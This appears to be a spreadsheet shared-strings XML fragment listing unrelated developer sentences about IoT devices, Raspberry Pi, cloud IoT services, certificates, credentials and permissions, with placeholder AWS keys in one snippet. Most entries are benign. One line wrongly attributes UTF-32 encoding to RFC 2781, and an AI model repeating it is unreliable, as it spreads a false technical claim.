    <t>You have to actually do something with the stored data structure after registering keys.</t>
  </si>
  <si>
    <t>As long as they are not enabled, register writes are ignored.</t>
  </si>
  <si>
    <t>You could always try to discover all your mdns devices using the android app called fing.</t>
  </si>
  <si>
    <t>I am sorry for asking a question based on such few credentials.</t>
  </si>
  <si>
    <t>This only works on a hardware beacons that implement Google's Eddystone Bluetooth GATT registration service.</t>
  </si>
  <si>
    <t>Also could also try to load the key/cert files after the s.connect() call?</t>
  </si>
  <si>
    <t>USB devices are not accessible by VISA due to read only access.</t>
  </si>
  <si>
    <t>You will then use the google-oauthlib-tool to exchange the client secret for user credentials.</t>
  </si>
  <si>
    <t>Then right before a calling startScan() i registered the receiver again.</t>
  </si>
  <si>
    <t>When I try to send the Credentials from a PC in the domain it works.</t>
  </si>
  <si>
    <t>Don't worry, just sign in with your Apple ID.</t>
  </si>
  <si>
    <t>The ReadMe file for the reference code mentions that you have to setup the authentication.</t>
  </si>
  <si>
    <t>Telemetry and device twins are quite different things.</t>
  </si>
  <si>
    <t>you have to initiate pairing from the Android device before sending the data over.</t>
  </si>
  <si>
    <t>But th eproblem not in config, when I use original config, I have to
  device detected in Dashboard.</t>
  </si>
  <si>
    <t>The private key never leaves the chip, ever.</t>
  </si>
  <si>
    <t>I have successfully used the MbedTLS to validate the server certificate using this technique.</t>
  </si>
  <si>
    <t>For example in loraserver.io you can have unique AppKey,AppEUI and DevEUI but in TheThingsNetwork you can register many devices for one application or AppEUI.</t>
  </si>
  <si>
    <t>also this is the IP that you need to register on the host of your site.</t>
  </si>
  <si>
    <t>As Roman Kiss mentioned:
replace SharedAccessSignature=SharedAccessSignature
to SharedAccessSignature
I don't know why there isn't an authorization issue with that but that works.</t>
  </si>
  <si>
    <t>You call the setCACert function with the certifcate that you can obtain using openssl.</t>
  </si>
  <si>
    <t>I don't know why or how, I have to re-add my wifi credentials after all again, into the MOS console.</t>
  </si>
  <si>
    <t>Some permissions fail silently and show up as an bug.</t>
  </si>
  <si>
    <t>Here's the description from hack-a-day.</t>
  </si>
  <si>
    <t>Local security settings for Windows</t>
  </si>
  <si>
    <t>However, this is beyond the state of the art for many types of application security flaws.</t>
  </si>
  <si>
    <t>a repackage of the Bouncy Castle Java cryptographic libraries, targeted specificlly at Android</t>
  </si>
  <si>
    <t>All modules (angular core or 3rd party) that should be available to an application must be registered using this mechanism.</t>
  </si>
  <si>
    <t>OpenFB allows you to login to Facebook and execute any Facebook Graph API request.</t>
  </si>
  <si>
    <t>The Security Alert message is often accompanied with a Google-Play rejection.</t>
  </si>
  <si>
    <t>It is used by many independent developers for writing blockchain applications.</t>
  </si>
  <si>
    <t>ID: Unique attribute in DOM, or any other point of architecture.</t>
  </si>
  <si>
    <t>'Connect with PayPal' allows customers to sign in to your website using their PayPal login credentials.</t>
  </si>
  <si>
    <t>UEFI is a more secure replacement for the older BIOS firmware interface.</t>
  </si>
  <si>
    <t>RFC-4226 defines an algorithm to generate one-time passwords using an HMAC.</t>
  </si>
  <si>
    <t>A  java.lang.IllegalStateException is a Java  that:
Signals that a method has been invoked at an illegal or inappropriate time.</t>
  </si>
  <si>
    <t>Android apps often use self-signed certificates.</t>
  </si>
  <si>
    <t>For example, when registering cells, you use the  or registerNib:forCellWithReuseIdentifier: method.</t>
  </si>
  <si>
    <t>Client certificates are verified against one or more CA certificate(s) stored on the server.</t>
  </si>
  <si>
    <t>There is no more need to worry about all the nasty details of the protocols.</t>
  </si>
  <si>
    <t>Authenticode certificates can be obtained from certificate authorities trusted by Microsoft.</t>
  </si>
  <si>
    <t>Microsoft trusts the certificate authority to verify the applicants identity before issuing a certificate.</t>
  </si>
  <si>
    <t>Cydia Substrate is currently supported on jailbroken iOS and rooted Android devices.</t>
  </si>
  <si>
    <t>Non-repudiation is essentially being able to say if one user sends something to another user, that the second user can tell for certain that the data came from the first user.</t>
  </si>
  <si>
    <t>It assures recovery from a threshold of both node and network failures as well as partitions.</t>
  </si>
  <si>
    <t>Those permissions are then used for the file (or other object) created at a later time.</t>
  </si>
  <si>
    <t>Flashblock does not prevent the elements from being downloaded.</t>
  </si>
  <si>
    <t>Its used for confirming the email id mentioned by user to signup.</t>
  </si>
  <si>
    <t>URL
The URL used to obtain access to the GCM for Chrome service: https://accounts.google.com/o/auth2/auth.</t>
  </si>
  <si>
    <t>An app can request to get notifications when one or more proximity beacons appear or disappear.</t>
  </si>
  <si>
    <t>Those sensors are reffered to as beacon or seed nodes.</t>
  </si>
  <si>
    <t>Server apps can also ask for access tokens to this API.</t>
  </si>
  <si>
    <t>Deadbolt 2 is an authorization system for the Play framework, offering idiomatic APIs for Java and Scala.</t>
  </si>
  <si>
    <t>How to read F# type signatures?</t>
  </si>
  <si>
    <t>Fluid Content Elements are registered through TypoScript.</t>
  </si>
  <si>
    <t>Zero Intrusion: Components don't need to reference Autofac.</t>
  </si>
  <si>
    <t>Rebex has components for SFTP client and server, FTP, FTPS, IMAP, POP3, SMTP, NTP, SNTP, Time, Mail, HTTPS, SSH Shell and Telnet Terminal emulation, Security, ZIP compression, File Server.</t>
  </si>
  <si>
    <t>HTML version of Intel's insn set reference, auto-generated from the PDF.</t>
  </si>
  <si>
    <t>The algorithm for encoding code points in UTF-8 is described in RFC 3629.</t>
  </si>
  <si>
    <t>The algorithm for encoding code points as UTF-16 is described in RFC 2781.</t>
  </si>
  <si>
    <t>An overview of various OAuth implementations in different languages.</t>
  </si>
  <si>
    <t>More information: elgg.org
A commercial turnkey/hosting option is also available through elgg.com.</t>
  </si>
  <si>
    <t>Only one Backup node may be registered with the NameNode at once.</t>
  </si>
  <si>
    <t>In the iPhone's short history, access has always been obtained.</t>
  </si>
  <si>
    <t>Kerberos supports one-time password (OTP) tokens for multi-factor authentication (RFC 6560).</t>
  </si>
  <si>
    <t>UI Spy uses the UI Automation libraries.</t>
  </si>
  <si>
    <t>The identified persons can be linked to contacts in your google account.</t>
  </si>
  <si>
    <t>The algorithm for encoding code points as UTF-32 is described in RFC 2781.</t>
  </si>
  <si>
    <t>.xlsx is the new default Excel format, it cannot contain any VBA (for security reasons as stated by Microsoft).</t>
  </si>
  <si>
    <t>These cameras are frequently used for video surveillance.</t>
  </si>
  <si>
    <t>If you open the Iot Hub Device Explorer you can Generate SAS token to access the Iot Hub API.</t>
  </si>
  <si>
    <t>And I am successfully logged in my container repository (azurecr.io).</t>
  </si>
  <si>
    <t>It can't be used to crypt root partition though.</t>
  </si>
  <si>
    <t>alternatively you could use SSH into the RPi if it is a on a network and run the script</t>
  </si>
  <si>
    <t>Later version of the code (arduino_bundle_ADK_02) doesn't need to be patched.</t>
  </si>
  <si>
    <t>Certbot documentation can be found here.</t>
  </si>
  <si>
    <t xml:space="preserve">
The Ajax Data Controls is a DotNetSlackers project.</t>
  </si>
  <si>
    <t>;
For SharedAccessKey I have given Device Key, But its not working</t>
  </si>
  <si>
    <t>The TL;DR is you won't be able to protect it against everything that comes to mind.</t>
  </si>
  <si>
    <t>could anyone show some example codes?</t>
  </si>
  <si>
    <t>My project is about home security system.</t>
  </si>
  <si>
    <t>I can't connect with SSH, the program that ran is not running anymore, etc.</t>
  </si>
  <si>
    <t>I registered it on the AWS System Manager shown in the pic below.</t>
  </si>
  <si>
    <t>Adjustable per-project permissions.</t>
  </si>
  <si>
    <t>Apple documentation for safeAreaLayoutGuide.</t>
  </si>
  <si>
    <t>I use PUTTY to connect to raspberry pi, it keeps giving me error says my password is incorrect.</t>
  </si>
  <si>
    <t>Has anyone run openi_camera successfully on the Intel Galileo board?</t>
  </si>
  <si>
    <t>I registered my Raspberry Pi with IBM Bluemix successfully .</t>
  </si>
  <si>
    <t>But using  it was successfully login.</t>
  </si>
  <si>
    <t>I'm following this tutorial to connect up Watson IoT with Blockchain.</t>
  </si>
  <si>
    <t>Master code:
Slave code:
Both codes gives only zeros.</t>
  </si>
  <si>
    <t>Do I need to give more permissions for this user?</t>
  </si>
  <si>
    <t>And you need to check safe_mode options in your php.ini file (like  and safe_mode_exec_dir).</t>
  </si>
  <si>
    <t>End users can access Microsoft CRM in the following ways.</t>
  </si>
  <si>
    <t>Extended Permissions
Extended Permissions give access to more sensitive info and the ability to publish and delete data.</t>
  </si>
  <si>
    <t>NOTE: it strongly recomended expose this views with gevent pywsgi server, because every connection is permanent blocking stream.</t>
  </si>
  <si>
    <t>The license conditions of each individual media file can be found on their description page.</t>
  </si>
  <si>
    <t>From an SDK perspective there are only a few types of failures that can be detected, mostly related to network and protocols.</t>
  </si>
  <si>
    <t>You can find a great Tutorial (including the missing setLockState() function) for a biometric-security-box on the website of Adafruit.</t>
  </si>
  <si>
    <t>ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.</t>
  </si>
  <si>
    <t>What I am actually doing is I deactivate the HDMI and USB port when the Raspberry Pi is launched, and protect the SSH connexion with a password.</t>
  </si>
  <si>
    <t>It looks like Google really wants us to use 2-step verification, and thus an app-specific password, going forward.</t>
  </si>
  <si>
    <t>This identifier is unique not only to the server on which it originated, but is unique across all servers in a given replication setup.</t>
  </si>
  <si>
    <t>Programming questions about Kismet wireless network detector, sniffer, and intrusion detection system.</t>
  </si>
  <si>
    <t>Profiling runs transparently in the background and profile data can be collected at any time.</t>
  </si>
  <si>
    <t>Detection services for user's hand location and state.</t>
  </si>
  <si>
    <t>The API can be used by anyone who wants to create their own experience for registering, purchasing, and managing a domain.</t>
  </si>
  <si>
    <t>Their respective chip selects can not share the same pin.</t>
  </si>
  <si>
    <t>StackOverflow is not the place to ask why your device's personal hotspot functionality is somehow handicapped.</t>
  </si>
  <si>
    <t>I need to enable secure boot and use flash encryption.</t>
  </si>
  <si>
    <t>I connect to my Raspberry pi via ssh, but I am not with it at the moment, otherwise I would connect a monitor to it, to check for error messages on boot up.</t>
  </si>
  <si>
    <t>The cert which signed this device cert has been uploaded and verified and is still valid.</t>
  </si>
  <si>
    <t>However, the permissions on the /sys/class/gpio/gpio17/value file exists but the group permissions is read-only.</t>
  </si>
  <si>
    <t>I`m writing simple script for my home security system.</t>
  </si>
  <si>
    <t>Description:
I am MAking A webserver on ESP-8266(01), that will control 3 locks using Arduino Mega.</t>
  </si>
  <si>
    <t>Are there some hidden access control settings we are missing?</t>
  </si>
  <si>
    <t>I'm referring this tutorial to create a device identity.</t>
  </si>
  <si>
    <t>One other detail - I went back then to use signtool to verify the signature.</t>
  </si>
  <si>
    <t>Obviously, for the user-mode thing you have to have the proper permissions or be root.</t>
  </si>
  <si>
    <t>That suggests you still have an IoT node in your flow with the incorrect credentials.</t>
  </si>
  <si>
    <t>Here's a quick hack I tried:
Mount as sftp folder(ssh+ftp)
If your servers are already mounted then skip to the next step.</t>
  </si>
  <si>
    <t>It is a descendant of an earlier game called Hack (1985), which is a descendant of Rogue (1980).</t>
  </si>
  <si>
    <t>.jsfl files are used to add functionality in the Flash Authoring environment; they contain JavaScript code and access the Flash JavaScript API.</t>
  </si>
  <si>
    <t>You can reboot the server when needed, resize it larger or smaller, and connect to the server securely through SSH once it is started.</t>
  </si>
  <si>
    <t>Authentication may be implemented using Credentials, each of which is composed of a User ID and Password.</t>
  </si>
  <si>
    <t>Listings of identifiers exported by a given module.</t>
  </si>
  <si>
    <t>If you don't plan on submitting a package, there's no need to register.</t>
  </si>
  <si>
    <t>Usually this happens because a user-written program has not logged on.</t>
  </si>
  <si>
    <t>Adobe Connect is a product by Adobe that allows registered user to create "over the internet" meetings between users.</t>
  </si>
  <si>
    <t>Assuming:
I know the iphone mac address
IP may change over time
I can't access so DHCP logs
I can run a server on a raspberry pi to sniff (I don't like it)</t>
  </si>
  <si>
    <t>I wrote this sketch to send codes to a speakjet sound processor.</t>
  </si>
  <si>
    <t>I'm creating a door locking system for a Raspberry Pi.</t>
  </si>
  <si>
    <t>if User enter name and password it has to check and gives back error report.</t>
  </si>
  <si>
    <t>What I'm confused about is I know BLE has security measures but how do I go about implementing these.</t>
  </si>
  <si>
    <t>network In most cases you are behind
a proxy or have bad network settings.</t>
  </si>
  <si>
    <t>I would like to know if this is more likely because the raspbian system is not reliable or it is because my code has some hidden issues.</t>
  </si>
  <si>
    <t>But weather shield needs wire library, to use sensors.</t>
  </si>
  <si>
    <t>Using groupOfNames on one of my servers for LDAP Authentication, I wanted to move openLDAP to a raspberry pi for testing.</t>
  </si>
  <si>
    <t>From what I can tell the ID should be unique so why then would their sample code include:
Could it be a counterfeit chip?</t>
  </si>
  <si>
    <t>Sorry, I know this is very long code, but I can't understand why I get the corrupt message.</t>
  </si>
  <si>
    <t>(in /usr/lib/arm-linux-gnueabihf/libcrypto.so.1.0.0)
==7730== Your program just tried to execute an instruction that Valgrind
==7730== did not recognise.</t>
  </si>
  <si>
    <t>I'm also not supposed to post the URL of the said webpage publicly, as it needs a login which I am not at liberty to release.</t>
  </si>
  <si>
    <t>rDD^..B.2tZ:,RArCk.-N^b^
Question is, how can I check on android end if the response was malformed?</t>
  </si>
  <si>
    <t>I'm working on a simple door alarm system using the raspberry pi.</t>
  </si>
  <si>
    <t>My question is what is the easiest way to detect those keypresses inside a python script.</t>
  </si>
  <si>
    <t>I'm just getting started with encryption and writing code that is a little more secure while transferring data.</t>
  </si>
  <si>
    <t>We looked up some useful libraries for Arduino encryption which are mainly written in C++.</t>
  </si>
  <si>
    <t>COMPONENT STORE TRANSACTION FAILURE SUMMARY
    No transaction error was detected.</t>
  </si>
  <si>
    <t>However, I'm trying to write it into an automated script (which is fed just the IP and the password) and I can't get it working.</t>
  </si>
  <si>
    <t>I gave my raspberry pi a static ip (the one that is now the invalid host) but it has worked for months with that.</t>
  </si>
  <si>
    <t>");
}
keys.cpp file:
#include "keys.h"
// AWS User Credentials
const char* awsKeyID = "XXXXXXXXXXXXXXXXXXXX";
const char* awsSecKey = "X1xxx23xxxxXXXX34XXxxxxX56xXxxxxxxXx789x";
// AWS IoT
const char* awsIotRegion = "eu-central-1";
const char* awsIotEndpoint = "xxxxxxxxxxxxxx";
const char* awsIotDomain = "iot.eu-central-1.amazonaws.com";
// Init and connect WiFi to local WLAN
char* wifiSsid = "mySSID";
char* wifiPwd = "password";</t>
  </si>
  <si>
    <t>The chip signature changes, but it always starts with 0x88.</t>
  </si>
  <si>
    <t>The Keystore here is created out of downloaded certificates from my AWS account associated to this THING.</t>
  </si>
  <si>
    <t>ESP returns only rubish.. withot "Ready" and don't get firmware information.</t>
  </si>
  <si>
    <t>Do you preload the device with some basic credentials that allow you to then pair the device with a user account, e.g.</t>
  </si>
  <si>
    <t>I know I can ssh into my Raspberry Pi and run scripts manually but the idea of this application is automation.</t>
  </si>
  <si>
    <t>The lightning serial cable is available with companies like RedPark which say they are MFi Certified.</t>
  </si>
  <si>
    <t>The network has 
PROXY
    Proxy hostname : 
Proxy port :
IP Settings 
Static 
IP address :
Gateway :
Network length :
DNS 1 :
DNS 2 : 
Edit 1 : 
This code work for network without internet.</t>
  </si>
  <si>
    <t>I verified the wifi program was working with advanced ip scanner.</t>
  </si>
  <si>
    <t>Once I finished my all stuff, I want my SD card/code to be properly locked.</t>
  </si>
  <si>
    <t>Will the Azure IoT hub detect that the device uses spoofed identity.</t>
  </si>
  <si>
    <t>The file and its '/transfer' folder have read permissions for World.</t>
  </si>
  <si>
    <t>So, here comes the question: is there a way to access each of these raspberries via their private IP addresses from outside my network?</t>
  </si>
  <si>
    <t>I'm using Raspberry pi 2 Model B
I want to connect my raspberry pi to a detected wifi networks through my mobile phone.</t>
  </si>
  <si>
    <t>This is the function I use to read the verification output from the Arduino.</t>
  </si>
  <si>
    <t>Right now, my code fires the Nerf gun no matter if a face is detected or not.</t>
  </si>
  <si>
    <t>I'm building an IoT app that needs to detect when a removable device was inserted and removed.</t>
  </si>
  <si>
    <t>Cloud foundry provides facility to specify credentials as part of  command.</t>
  </si>
  <si>
    <t>However, with my replacement of it with wolfSSL, I am getting a failure with error = 42, which seems to be that the server rejected the client certificate...?</t>
  </si>
  <si>
    <t>Ideally, I'd like to have the LCD display a * for each character typed, liked on a real security system, but I haven't managed to do that either.</t>
  </si>
  <si>
    <t>: I forgot to mention that when I disable the url masking on godaddy redirection, it works and I can access my website, but the dtdns url appears.</t>
  </si>
  <si>
    <t>I've read it was difficult to obfuscate Python code, is it still true ?</t>
  </si>
  <si>
    <t>After I call cognitoUser.signOut() I can still use the cached Id tokens to get credentials and connect to AWS IoT.</t>
  </si>
  <si>
    <t>(I am modifying the module to act as Captive Portal to collect data from different users) 
I think I can use GUID, current date/time or user's MAC (ideal option) as filename.</t>
  </si>
  <si>
    <t>I tried to write a thread safe logger for my UWP Application in C# which runs on a Raspberry Pi with Microsoft IoT but I have no idea where to begin.</t>
  </si>
  <si>
    <t>Both CA certs could be stored and verified without any problems in IOTHub.</t>
  </si>
  <si>
    <t>I need to write a basic encryption program for ESP8266.</t>
  </si>
  <si>
    <t>Have I understand the concept right by "bitbucket ssh key stored in the host(rpi) and with this technic I will copy that keys in to container."</t>
  </si>
  <si>
    <t>It is visible in a webpage coded with PHP, hosted online.</t>
  </si>
  <si>
    <t>This is the circuit that I built:
This is the code that I have now:
So my difficult now, is that when I press the pushbutton it doesn't get always detected.</t>
  </si>
  <si>
    <t>Problem
I want to secure my Raspberry pi in a special way.</t>
  </si>
  <si>
    <t>The second option indicated that the root directory could not be locked.</t>
  </si>
  <si>
    <t>Could not obtain a developer license due to error 80004001.</t>
  </si>
  <si>
    <t>I have created a self signed X509 certificate and enrollment group too.</t>
  </si>
  <si>
    <t>It says /* Invalidate window if read data is not valid */, but I am not reading any data</t>
  </si>
  <si>
    <t>Because I ruled out certificates, server settings and transport, I am assuming that my problem is with the Chipper.</t>
  </si>
  <si>
    <t>Package Google.Apis.Auth.AspNetCore 1.38.0 supports: netstandard2.0 (.NETStandard,Version=v2.0)
Is this just not supported or there is there something I can change or upgrade?</t>
  </si>
  <si>
    <t>But the problem not in config, when I use original config, I have no device detected in Dashboard.</t>
  </si>
  <si>
    <t>OAuthProblemException{error='bad_verification_code', description='The code passed is incorrect or expired.</t>
  </si>
  <si>
    <t>I am having problems connecting to AWS IOT from a python script using Cognito credentials.</t>
  </si>
  <si>
    <t>This is the managed policy AWSIoTDataAccess that was defined earlier in the IdentityPoolAuthRole.</t>
  </si>
  <si>
    <t>However, when trying to get the signature of the C, it only gives me a blank output.</t>
  </si>
  <si>
    <t>network In most cases you are behind a proxy or have bad network settings.</t>
  </si>
  <si>
    <t>i feel like the guide isnt for the door lock and thats why it isnt working.</t>
  </si>
  <si>
    <t>This one detects if an admin code was sent and triggers a response.</t>
  </si>
  <si>
    <t>I do not want my customers to have to accept an "unsecure" private certificate every time before they can use my application.</t>
  </si>
  <si>
    <t>The fact that vagrant is asking for password is the highest point I reached so far..</t>
  </si>
  <si>
    <t>When I reconnect to AWS IoT Core, every certificate is resent, consuming a lot of data (12kB for CONN + CONNACK plus 300B for PUBLISH).</t>
  </si>
  <si>
    <t>But I have no idea of how to use the token to reconnect in the firmware.</t>
  </si>
  <si>
    <t>I have to authenticate a transaction, say a system which will use a pre-fed authentication id to verify any user using the system.</t>
  </si>
  <si>
    <t>Credentials/Identity per leaf device allowing for black listing etc.</t>
  </si>
  <si>
    <t>On windows pcs, I'm storing my AWS Credentials in a text file in the folder .aws.</t>
  </si>
  <si>
    <t>Also, we can't see the source of the php_serial class without registering for an account, which I do not wish to do.</t>
  </si>
  <si>
    <t>From the sounds of things your device is currently not advertising itself using that profile.</t>
  </si>
  <si>
    <t>( I tried it for Uno r3, but i believe it will work for all Arduino Boards )
Plugin your Arduino Board
Go to Control Panel ---&gt; System and Security ---&gt; System ---&gt; On the left pane Device Manger
Expand Other Devices.</t>
  </si>
  <si>
    <t>The files that I was trying to give "execute" privilege to were on a usb memory stick.</t>
  </si>
  <si>
    <t>If your hardware supports this rate, it's allowed... Verify it before.</t>
  </si>
  <si>
    <t>Sometimes software that runs in a tight loop will prevent the bootloader from connecting.</t>
  </si>
  <si>
    <t>This one is easy: Start with 
What I ofcourse mean, that to distrust /proc/cpuinfo means to distrust the running kernel - under this premise, all bets are off.</t>
  </si>
  <si>
    <t>The reason is because the ownership and permissions are defined at mount time for the  FS.</t>
  </si>
  <si>
    <t>Every time a new file is added to the security folder, it gets emailed to me.</t>
  </si>
  <si>
    <t>For additional information check out the LEGO firmware documentation Communications Overview.</t>
  </si>
  <si>
    <t>I do not have "2 step verification" setup on my account currently.</t>
  </si>
  <si>
    <t>So early access builds, like yours, never included access to media.</t>
  </si>
  <si>
    <t>It could bring security issues if any devices in the network could have access to port forwarding...</t>
  </si>
  <si>
    <t>Please add this:
If it's low, the Wiznet chip corrupts the SPI bus.</t>
  </si>
  <si>
    <t>You need an AF_PACKET socket to get access to the ethernet header if trying to setup the VLAN tag manually.</t>
  </si>
  <si>
    <t>You would need a trusted and locked down firmware that functions as such a RTM.</t>
  </si>
  <si>
    <t>It seems this is triggered by an activated privacy feature.</t>
  </si>
  <si>
    <t>The short answer to your question is yes - but you can also always verify this in your code as well.</t>
  </si>
  <si>
    <t>The directory names in /sys/class/gpio/ need to be identified with their hardware register counterparts.</t>
  </si>
  <si>
    <t>UI / view controllers / storyboard stuff is not thread safe.</t>
  </si>
  <si>
    <t>You need to navigate to  where you will be promoted to enter your github credentials.</t>
  </si>
  <si>
    <t xml:space="preserve"> is method will block the thread,when no device is detected connecting server,it will block, means the code after accept() will not executed.</t>
  </si>
  <si>
    <t>A different solution could be to add ram chips outside and access the through the code.</t>
  </si>
  <si>
    <t>If security isn't a problem you could send your data as a GET request like they do on this tutorial.May not be the best way but it works.</t>
  </si>
  <si>
    <t>What can you do
Your idea of having the login and having the real site in two different hosts imposes challenges.</t>
  </si>
  <si>
    <t>But for BBB: Yes, you can use the Powersupply cable to share the internet connection and even login in to BBB.</t>
  </si>
  <si>
    <t>There is no such thing as partial cryptography: either you do it correctly or you are not doing it at all.</t>
  </si>
  <si>
    <t>Note: Don't forget to register the broadcast receiver in the manifest and include necessary permissions.</t>
  </si>
  <si>
    <t>Just be aware that obvoiusly your app will not be able to access the BLE hardware while LightBlue is connected to your device.</t>
  </si>
  <si>
    <t>You could ssh manually to the pi's local ip address instead.</t>
  </si>
  <si>
    <t>However
  if you are connecting to an Android peer then please generate your own
  unique UUID.</t>
  </si>
  <si>
    <t>But it would be much more secure than writing the password to the storage.</t>
  </si>
  <si>
    <t>Another thing you can do is assign the device some kind of a token.</t>
  </si>
  <si>
    <t>It connected without problems but I still couldn't connect to my target access point.</t>
  </si>
  <si>
    <t>I must have scanned your Lua code too quickly the first time.</t>
  </si>
  <si>
    <t>Like you said, the documents say:
Declare permissions that you need in your app's manifest file.</t>
  </si>
  <si>
    <t>Mac OS: Enable internet sharing on the Ethernet port.</t>
  </si>
  <si>
    <t>Firstly I2C devices are not dynamically enumerated as like USB devices.</t>
  </si>
  <si>
    <t>Please refer [1] &amp; [2] to understand how custom auth mechanism can be used.</t>
  </si>
  <si>
    <t>This is how Google will associate the user's account on the Assistant with your account, and how Google will identify (to you) which user is issuing the command.</t>
  </si>
  <si>
    <t>take necessary steps to hack proof the page</t>
  </si>
  <si>
    <t>In contrast to IA-32, ARM's equivalent of cpuid is a privileged instruction.</t>
  </si>
  <si>
    <t>You can use SSL to connect to a local (not registered) domain, but not using letsencrypt.</t>
  </si>
  <si>
    <t>This happens when common name of the certificate is being verified, it is pointed to a host name.</t>
  </si>
  <si>
    <t>SSL or non-SSL will already have been handled before these headers can be read, so they are unneeded (and so might only cause trouble).</t>
  </si>
  <si>
    <t>It also prevents a certificate or Cognito identity from attaching to a Thing that it doesn't have permissions.</t>
  </si>
  <si>
    <t>You need to wait with any networking related functions until you get connected to the access point.</t>
  </si>
  <si>
    <t>Documents of your BLE device in question should say more about its authentication method.</t>
  </si>
  <si>
    <t>AWS looks for its credentials in a location which resolves to $HOME/.aws.</t>
  </si>
  <si>
    <t>If you connect the cable with RaspBerry, you should assign a static ip:
Example:
cmdline.txt
ip=&lt;client-ip&gt;:&lt;server-ip&gt;:&lt;gw-ip&gt;:&lt;netmask&gt;:&lt;hostname&gt;:&lt;device&gt;:&lt;autoconf&gt;
next step; You will connect Putty via ssh and enable VNC.</t>
  </si>
  <si>
    <t>You'll do that using the verify method on the client object.</t>
  </si>
  <si>
    <t>Why didn't they add a password for the Access Point connection.</t>
  </si>
  <si>
    <t>I assume you entered the value  to hide your real authentication token.</t>
  </si>
  <si>
    <t>This step verifies you are the owner of the root certificate.</t>
  </si>
  <si>
    <t>If the wifi files are stored on the raspberry device, you can identify the WIFI by the SSID number (courtesy of elParaguayo at rasbperry forums):</t>
  </si>
  <si>
    <t>I do not have the equipment or accounts to test/verify this.</t>
  </si>
  <si>
    <t>First connect to the api and after that make queries like providing your api key and feilds 
remove this.</t>
  </si>
  <si>
    <t>DDNS is just a way of translating from a name to an IP address and doesn't imply anything about being accessible to the public.</t>
  </si>
  <si>
    <t>If you're not able to successfully flash the board or the new firmware doesn't run properly then toss it and get a new ESP01 - it's probably damaged and you're unlikely to be able to repair it.</t>
  </si>
  <si>
    <t>I think you can use Device Portal API to get the available wifi networks information.</t>
  </si>
  <si>
    <t>Well, after playing and testing a lot it looks so that it seems to be not possible to work with self signed certificates.</t>
  </si>
  <si>
    <t>Second, you need to check if the location is valid and then write them to the SD.</t>
  </si>
  <si>
    <t>When using your own generated keys, you need to create and register the corresponding CA certificate with AWS IoT.</t>
  </si>
  <si>
    <t>Not all phones are built to understand the same protocols.</t>
  </si>
  <si>
    <t>If you have root and can hack your kernel, FTDI offers its D2XX driver for Android OS.</t>
  </si>
  <si>
    <t>QSslSocket is an SSL-encrypted network socket class, from the Qt library</t>
  </si>
  <si>
    <t>Smart IP identify visitor's geographical location (longitude/latitude), country, region, city and postal code based on the IP address of the user.</t>
  </si>
  <si>
    <t>A package for using Python as a hardware description and verification language.</t>
  </si>
  <si>
    <t>The zone to which a website is assigned specifies the security settings that are used for that site.</t>
  </si>
  <si>
    <t>REVOKE is a standard SQL command to revoke privileges from a user or role in a database system.</t>
  </si>
  <si>
    <t>SunPKCS11 is a Java crypto provider for interfacing with PKCS#11 tokens.</t>
  </si>
  <si>
    <t>The OAuth access token specific to the Facebook API.</t>
  </si>
  <si>
    <t>Notable services using JWT are OpenID, thinktecture IdentityModel, and Google Payment API.</t>
  </si>
  <si>
    <t>In some languages, it could also give this exception if you aren't able to access the file due to security permissions.</t>
  </si>
  <si>
    <t>Related tags: password credentials hashing bcrypt</t>
  </si>
  <si>
    <t>This function will release any write-locks on the file.</t>
  </si>
  <si>
    <t>Barcode4J is a flexible generator for barcodes written in Java.</t>
  </si>
  <si>
    <t>libssh is a C library that enables you to write a program that uses the SSH protocol.</t>
  </si>
  <si>
    <t>The implementation is then registered with a component using  method.</t>
  </si>
  <si>
    <t>Device Trees are related to open firmware.</t>
  </si>
  <si>
    <t>It provides a flexible and programmable API to query WHOIS servers and look up IP, TLD, and domain WHOIS information.</t>
  </si>
  <si>
    <t>(typically, a username and password pair), using user-agent redirections</t>
  </si>
  <si>
    <t>It was created by Chris Leishman and become widely used by JavaScript engineers to verify their code.</t>
  </si>
  <si>
    <t>Without Kerberos delegation in place, the client user credentials cannot be passed to the database server.</t>
  </si>
  <si>
    <t>Users don't have to wait for syncs and indexes to complete before they can access their account.</t>
  </si>
  <si>
    <t>Indeed, it also may be regarded as a replacement for confirm() and prompt().</t>
  </si>
  <si>
    <t>Kronos data can be accessed and manipulated with POST requests sent to the XML API.</t>
  </si>
  <si>
    <t>Read more at: Specifying Security Constraints at Oracle site.</t>
  </si>
  <si>
    <t>NSDataDetector detecting phone number text</t>
  </si>
  <si>
    <t>These locations can be used in Ads but need to be verified to be eligible to appear in Search and Maps.</t>
  </si>
  <si>
    <t>Key-value pairs in localStorage can only be read by client-side code from the same domain.</t>
  </si>
  <si>
    <t>They can also be inappropriately used to track the browsing history and to transfer malware.</t>
  </si>
  <si>
    <t>Currently, the main concepts of Keyrock are: 
Users 
Have a registered account in Keyrock.</t>
  </si>
  <si>
    <t>Can register Pep Proxy to protect backends.</t>
  </si>
  <si>
    <t>So, our efforts had mostly targeted to implement the SSH2 protocol for X11 forwarding.</t>
  </si>
  <si>
    <t>The certificate can be used to verify that a public key belongs to an individual.</t>
  </si>
  <si>
    <t>Logging last login IP-address and time (optional).</t>
  </si>
  <si>
    <t>Email can be changed even BEFORE account is activated.</t>
  </si>
  <si>
    <t>Useful links
RFC-4226, "HOTP: An HMAC-Based One-Time Password Algorithm"</t>
  </si>
  <si>
    <t>But I have two issues 1. who(raspberry pi or server) should generate the key pairs 2. who keeps the private key.</t>
  </si>
  <si>
    <t>Now I need to use the tag in my android app to identify the user whenever his tag will be read by the NFC reader.</t>
  </si>
  <si>
    <t>Neither the script or the Java code contain sudo but as the jar is executed as sudo, vlc still gives the error "VLC is not supposed to be run as root...".</t>
  </si>
  <si>
    <t>However, whenever I try to access the installation script it states: 
Forbidden
You don't have permission to access /dokuwiki/install.php on this server.</t>
  </si>
  <si>
    <t>Our goal is to make the raspberry pi to detect the WIFI and connect itself to the WIFI.</t>
  </si>
  <si>
    <t>Here's the Arduino code without the HTTP authentication :
And, here's the code with the authentication :
The website loads properly.</t>
  </si>
  <si>
    <t>And I do not understand how I can make guarantee delivery for my data to AWS IoT MQTT service.</t>
  </si>
  <si>
    <t>I think that by enabling the digest auth, I will have write permissions but I still haven't.</t>
  </si>
  <si>
    <t>I have an issue generating agent credentials.</t>
  </si>
  <si>
    <t>I'm trying things like the one provided in the code example, but I do not get the expected result:
char cifrado[300];
  memset(cifrado, '\0', sizeof(cifrado));
  strcat(requestESB, "&amp;cifrado="); 
  strcat(requestESB, (char*)encrypted_message);
(Forgive if my English is bad enough, but I'm not good at speaking it and I'm using the translator)</t>
  </si>
  <si>
